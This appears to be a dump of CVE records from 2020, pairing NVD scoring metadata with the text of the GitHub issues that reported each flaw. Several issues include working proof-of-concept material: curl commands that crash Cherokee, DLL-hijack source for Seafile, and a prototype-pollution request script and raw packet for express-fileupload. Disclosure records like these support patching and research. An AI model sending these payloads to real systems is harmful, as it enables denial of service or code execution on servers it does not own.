Cherokee Web Server 0.4.27 to 1.2.104 have a NULL pointer dereference which leads to a denial of service. Any server that has HTTP authentication (either basic or digest) enabled and paths that respond with the WWW-Authenticate header, can be crashed by an unauthenticated and remote attacker by sending a malformed Authorization header to such paths. The following commands are used to generate HTTP requests that trigger the vulnerability ``` 1) curl -H "Authorization: Basic " <url> 2) curl -H "Authorization: Digest " <url> ``` `cherokee_buffer_add` does not allocate memory if the the size of the input string is less or equal to zero and return `ret_ok` nonetheless. ``` ret_t cherokee_buffer_add (cherokee_buffer_t *buf, const char *txt, size_t size) { int available; if (unlikely (size <= 0)) return ret_ok; . . . ``` `cherokee_validator_parse_digest` and `cherokee_validator_parse_basic` do not have any checks on the return value from `cherokee_buffer_add` and will later dereference an uninitialized pointer (read and write), at `validator.c:180` ``` ret_t cherokee_validator_parse_digest (cherokee_validator_t *validator, char *str, cuint_t str_len) { cuint_t len; char *end; char *entry; char *comma; char *equal; cherokee_buffer_t auth = CHEROKEE_BUF_INIT; cherokee_buffer_t *entry_buf; /* Copy authentication string */ cherokee_buffer_add (&auth, str, str_len); entry = auth.buf; end = auth.buf + auth.len; do { /* Skip some chars */ while ((*entry == CHR_SP) || (*entry == CHR_CR) || (*entry == CHR_LF)) entry++; . . . ``` and in a call to `cherokee_buffer_decode_base64` (illegal write at `buffer.c:1681`) respectively ``` ret_t cherokee_validator_parse_basic (cherokee_validator_t *validator, char *str, cuint_t str_len) { char *colon; cherokee_buffer_t auth = CHEROKEE_BUF_INIT; /* Decode base64 */ cherokee_buffer_add (&auth, str, str_len); cherokee_buffer_decode_base64 (&auth); . . . ```
NULL pointer derefence during HTTP authentication
https://api.github.com/repos/cherokee/webserver/issues/1242/comments
3
2020-07-25T11:07:45Z
2020-07-25T20:17:14Z
https://github.com/cherokee/webserver/issues/1242
665,566,101
1,242
1,359
CVE-2020-8553
2020-07-29T15:15:13.450
The Kubernetes ingress-nginx component prior to version 0.28.0 allows a user with the ability to create namespaces and to read and create ingress objects to overwrite the password file of another ingress which uses nginx.ingress.kubernetes.io/auth-type: basic and which has a hyphenated namespace or secret name.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.9, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 0.7, "impactScore": 5.2, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 0.7, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/5126" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/5126" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*", "matchCriteriaId": "60159025-3CB0-40E3-B960-4479582F192F", "versionEndExcluding": "0.28.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "610" ]
610
https://github.com/kubernetes/ingress-nginx/issues/5126
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "ingress-nginx" ]
A security issue was discovered in ingress-nginx versions older than v0.28.0. The issue is of medium severity, and upgrading is encouraged to fix the vulnerability. **Am I vulnerable?** The vulnerability exists only if the annotation [nginx.ingress.kubernetes.io/auth-type: basic](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/#authentication) is used. **How do I upgrade?** Follow installation instructions [here](https://kubernetes.github.io/ingress-nginx/deploy/upgrade/) **Vulnerability Details** A vulnerability has been discovered where a malicious user could create a new Ingress definition resulting in the replacement of the password file. The vulnerability requires that the victim namespace and/or secret use a hyphen in the name. This scenario requires privileges in the cluster to create and read ingresses and also create secrets. This issue is filed as CVE-2020-8553. /close
CVE-2020-8553: ingress-nginx auth-type basic annotation vulnerability
https://api.github.com/repos/kubernetes/kubernetes/issues/126818/comments
7
2020-02-19T19:00:32Z
2024-08-20T17:54:47Z
https://github.com/kubernetes/kubernetes/issues/126818
2,475,652,594
126,818
1,360
CVE-2020-16143
2020-07-29T22:15:12.277
The seafile-client client 7.0.8 for Seafile is vulnerable to DLL hijacking because it loads exchndl.dll from the current working directory.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/haiwen/seafile-client/issues/1309" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/haiwen/seafile-client/issues/1309" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:seafile:seafile-client:7.0.8:*:*:*:*:seafile:*:*", "matchCriteriaId": "DE8E7545-B834-4073-B7B4-7307CF492BC1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "427" ]
427
https://github.com/haiwen/seafile-client/issues/1309
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "haiwen", "seafile-client" ]
**DLL:** exchndl.dll **Affected Process:** seaf-daemon.exe **Tested on:** Windows 10 Pro x64 Version 10.0.19041 **Description:** Seafile Client ver 7.0.8 is vulnerable to DLL hijacking because it loads “exchndl.dll” from the current working directory. **Steps to reproduce:** 1. Compile the following code and name the output dll file as “exchndl.dll”. 2. Execute Seafile from where the “exchndl.dll” exists. 3. The “exchndl.dll” file will be executed. **PoC Code:** ``` #include <windows.h> BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_mll(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_mll() { MessageBox(0, "Seafile DLL Hijacked!", "DLL Message", MB_OK); } ``` **Screenshots:** ![new](https://user-images.githubusercontent.com/68638314/88771753-b84bb600-d1a5-11ea-8ae8-9239cf562aba.png)
DLL Hijacking "exchndl.dll"
https://api.github.com/repos/haiwen/seafile-client/issues/1309/comments
3
2020-07-22T09:30:42Z
2021-02-20T12:35:36Z
https://github.com/haiwen/seafile-client/issues/1309
663,616,029
1,309
1,361
CVE-2020-7699
2020-07-30T09:15:11.373
This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/richardgirges/express-fileupload/issues/236" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200821-0003/" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-EXPRESSFILEUPLOAD-595969" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/richardgirges/express-fileupload/issues/236" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200821-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-EXPRESSFILEUPLOAD-595969" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:express-fileupload_project:express-fileupload:*:*:*:*:*:*:*:*", "matchCriteriaId": "75C3F9FC-7A2F-462D-84F9-F88152137F86", "versionEndExcluding": "1.1.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:*", "matchCriteriaId": "FD1FCB0D-3E19-4461-9330-4D7F02972A35", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/richardgirges/express-fileupload/issues/236
[ "Exploit", "Third Party Advisory" ]
github.com
[ "richardgirges", "express-fileupload" ]
This module has prototype pollution vulnerablity and it can make DOS with parseNested option. ## server ```js const express = require('express'); const fileUpload = require('express-fileupload'); const app = express(); app.use(fileUpload({ parseNested: true })); app.get('/', (req, res) => { res.end('express-fileupload poc'); }); app.listen(7777) ``` ## exploit ```python import requests res = requests.post('http://p6.is:7777', files = {'__proto__.toString': 'express-fileupload poc'}); ``` ## raw packet ``` POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=--------1566035451 Content-Length: 137 ----------1566035451 Content-Disposition: form-data; name="__proto__.toString"; filename="filename" content ----------1566035451-- ``` Full description is in here https://blog.p6.is/Real-World-JS-1/
Prototype Pollution
https://api.github.com/repos/richardgirges/express-fileupload/issues/236/comments
5
2020-07-29T02:48:39Z
2020-08-05T00:54:36Z
https://github.com/richardgirges/express-fileupload/issues/236
667,506,452
236
1,362
CVE-2020-16162
2020-07-30T16:15:11.850
An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. Missing validation checks on CRL presence or CRL staleness in the X509-based RPKI certificate-tree validation procedure allow remote attackers to bypass intended access restrictions by using revoked certificates. NOTE: there may be counterarguments related to backwards compatibility
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*", "matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A", "versionEndExcluding": null, "versionEndIncluding": "3.1-2020.07.06.14.28", "versionStartExcluding": null, "versionStartIncluding": "3.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/RIPE-NCC/rpki-validator-3/issues/162
[ "Third Party Advisory" ]
github.com
[ "RIPE-NCC", "rpki-validator-3" ]
This issue was also informally reported to RIPE NCC staff in late February 2020. It appears that RIPE NCC validator doesn't consider an expired CRL cause to consider the associated manifest and underlaying objects invalid. It logs a warning, but does not consider this situation erroneous. Theoretically a replay attack can be executed by making the CRL unavailable in a monkey-in-the-middle scenario, or presenting the validator with old data. The RPKI data download procedure in RIPE NCC's Validator must assume it is collecting untrusted data, which must be verified using the certificate verification model where an expired CRL means that none of the X509 objects pointing to the CRL can be validated or considered valid. Some more (hard to read) context is available in the RPKI standards forum at IETF via https://mailarchive.ietf.org/arch/msg/sidrops/BKbYujWcr4qWJOahFoBqgZHrFX8/ and specifically https://mailarchive.ietf.org/arch/msg/sidrops/6bHseJeNPSsK0lebbNTDGFKVYsA/ If the CRL is expired, the manifest & directory should not be considered eligible for further processing and the associated VRPs should not be emitted to the RTR process. Manifests and CRLs compliment each other, manifests are not a replacement for CRLs. The manifest specification assumes a sensible policy regarding CRL expiration is applied. Since RPKI does not have any other certificate revocation mechanisms other than CRLs (there is no OSCP and other tricks in the specs) - I believe that ignoring the CRLs expiration date opens up RIPE NCC's validator for replay attacks which can have adverse operational consequences (aka an attacker has the ability to flip BGP routes from `valid` to `invalid`) To be transparent: I'm filing this bug publicly so I can reference this later on in a write-up about how these validation issues were handled.
An expired or missing CRL doesn't result in the manifest being considered invalid
https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/162/comments
1
2020-03-30T14:33:10Z
2020-07-07T10:25:09Z
https://github.com/RIPE-NCC/rpki-validator-3/issues/162
590,340,650
162
1,363
CVE-2020-16162
2020-07-30T16:15:11.850
An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. Missing validation checks on CRL presence or CRL staleness in the X509-based RPKI certificate-tree validation procedure allow remote attackers to bypass intended access restrictions by using revoked certificates. NOTE: there may be counterarguments related to backwards compatibility
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*", "matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A", "versionEndExcluding": null, "versionEndIncluding": "3.1-2020.07.06.14.28", "versionStartExcluding": null, "versionStartIncluding": "3.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/RIPE-NCC/rpki-validator-3/issues/232
[ "Third Party Advisory" ]
github.com
[ "RIPE-NCC", "rpki-validator-3" ]
According to documentation the default operating mode of the RIPE NCC Validator is `rpki.validator.strict-validation = false`, this means that by default the validator operates in an insecure mode which is detrimental to the users of the software. It is beyond me why I have to open so many tickets to encourage the developers of this software to produce something that is not an immediate and urgent risk to anyone using this software.
RIPE NCC Validator by default is insecure
https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/232/comments
3
2020-07-07T10:34:28Z
2020-10-29T13:30:22Z
https://github.com/RIPE-NCC/rpki-validator-3/issues/232
652,210,852
232
1,364
CVE-2020-16163
2020-07-30T16:15:11.897
An issue was discovered in RIPE NCC RPKI Validator 3.x before 3.1-2020.07.06.14.28. RRDP fetches proceed even with a lack of validation of a TLS HTTPS endpoint. This allows remote attackers to bypass intended access restrictions, or to trigger denial of service to traffic directed to co-dependent routing systems. NOTE: third parties assert that the behavior is intentionally permitted by RFC 8182
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/159" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/159" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*", "matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A", "versionEndExcluding": null, "versionEndIncluding": "3.1-2020.07.06.14.28", "versionStartExcluding": null, "versionStartIncluding": "3.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/RIPE-NCC/rpki-validator-3/issues/159
[ "Third Party Advisory" ]
github.com
[ "RIPE-NCC", "rpki-validator-3" ]
RFC 8182 section 4.3 "HTTPS Considerations" states: > Because of this, Relying Parties SHOULD do TLS certificate and host name validation when they fetch from an RRDP Repository Server. The *SHOULD* probably should be read as a *MUST*, given the validator's susceptibility to fetch from a compromised (MITM'ed) RRDP service - especially when combined with a partial withholding attack. Note: checking the TLS certs of the RRDP channel makes MITM's harder - but not impossible! More work is needed in the validation procedure regardless of fixing this TLS RRDP issue. Recommendation: `rpki.validator.rrdp.trust.all.tls.certificates=true` should be changed to `rpki.validator.rrdp.trust.all.tls.certificates=false` in the default distribution & settings. It is hard to imagine a scenario where one would want to disable TLS certificate validation.
RRDP fetches should not proceed if the TLS HTTPS endpoint doesn't validate
https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/159/comments
9
2020-03-24T13:45:25Z
2020-07-07T10:26:16Z
https://github.com/RIPE-NCC/rpki-validator-3/issues/159
586,971,181
159
1,365
CVE-2020-16164
2020-07-30T16:15:11.943
An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate Revocation List files from the RPKI relying party's view. NOTE: some third parties may regard this as a preferred behavior, not a vulnerability
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/158" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/security/advisories/GHSA-q76j-58cx-wp5v" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/158" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/security/advisories/GHSA-q76j-58cx-wp5v" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*", "matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A", "versionEndExcluding": null, "versionEndIncluding": "3.1-2020.07.06.14.28", "versionStartExcluding": null, "versionStartIncluding": "3.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/RIPE-NCC/rpki-validator-3/issues/158
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "RIPE-NCC", "rpki-validator-3" ]
In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain .roa files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is parsable, CRL exists is valid (also not expired), and manifest is signed with keys not revoked by the CRL), *and* references files which do not exist in the repository at hand, the publication point should be considered compromised. So in the case of APNIC where an End User (self-hosted) RPKI publication point misses a few .roa files, the validator can proceed to consider all data from all RPs it could reach eligeble for further validation, except any data from the publication point where files were missing. In other words: if one or a few files are missing from the repository, the repository should be considered 'down', and no attempt should be made to start guessing what can be salvaged and what not.
Missing files don't result in a manifest being considered invalid
https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/158/comments
11
2020-03-23T17:35:24Z
2020-07-07T10:26:57Z
https://github.com/RIPE-NCC/rpki-validator-3/issues/158
586,392,353
158
1,366
CVE-2020-16165
2020-07-30T20:15:12.737
The DAO/DTO implementation in SpringBlade through 2.7.1 allows SQL Injection in an ORDER BY clause. This is related to the /api/blade-log/api/list ascs and desc parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
